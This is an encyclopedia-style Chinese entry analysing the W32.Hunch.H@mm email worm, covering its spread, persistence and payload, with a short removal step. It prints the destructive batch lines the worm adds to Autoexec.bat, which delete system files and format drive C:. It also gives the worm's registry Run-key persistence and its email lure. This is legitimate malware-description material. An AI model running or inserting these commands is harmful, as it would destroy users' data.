W32.Hunch.H@mm是一個網路蠕蟲病毒,它能夠更改Autoexec.bat檔案,並企圖格式化整個C糟中的全部檔案。此病毒感染安裝有Windows 95, Windows 98, Windows NT, Windows 2000, Windows XP, Windows Me作業系統的計算機,而不會感染安裝有Macintosh, Unix, Linux作業系統的計算機。
基本介紹
- 中文名:W32.Hunch.H@mm
- 傳播範圍:低
- 發現日期:2002-09-05
- 病毒類型:蠕蟲病毒
基本信息,病毒介紹,
基本信息
危害級別:高
傳播速度:高
病毒介紹
1.此病毒修改自動批處理檔案Autoexec.bat,並試圖將C糟整個格式化掉。
2.此病毒隨機在計算機上刪除5個以.xls, .doc, .wav,.dwg, .mp3,.bak, .cdx, .bmp, .htm, .hlp, .chm, .jpg, .tga, .cpl, .acd, .mid, .cdr, .mdb, .dbf,.ico結尾的檔案。
3.此病毒如果一旦被激活並開始運行,它將其本身以郵件的形式傳送到全部的Microsoft Outlook收件人地址中:
題目:<This varies depending on the originating file name>
正文:Tal como te prometi; te envio mi foto en el archivo adjuncto...
附屬檔案:<This varies depending on the originating file name>
4.此病毒運行之後,會在螢幕上顯示一張色情圖片。
5.此病毒一旦運行,它將複製本身到:
%system%\Newmsie7.exe
%system%\Setup.Exe
%system%\<Attachment file name>系統檔案中。
6.此病毒能夠生成鍵值(Setup %System%\Setup.Exe)到註冊表編輯器:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run中,使得機器啟動時,病毒就會自動運行。
7.能夠修改C:\Autoexec.bat檔案,並且添加下列命令:
DEL %system%\*.DAT
DEL %system%\*.COM
DEL %system%\*.EXE
CLS
FORMAT C: /u /v:COOL! /autotest
所以,在下次啟動計算機時(只適用於Windows 95/98/Me作業系統),硬碟會被格式化。
解決方案:
2.到註冊表編輯器:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run中將鍵值:
Setup %System%\Setup.Exe清除。
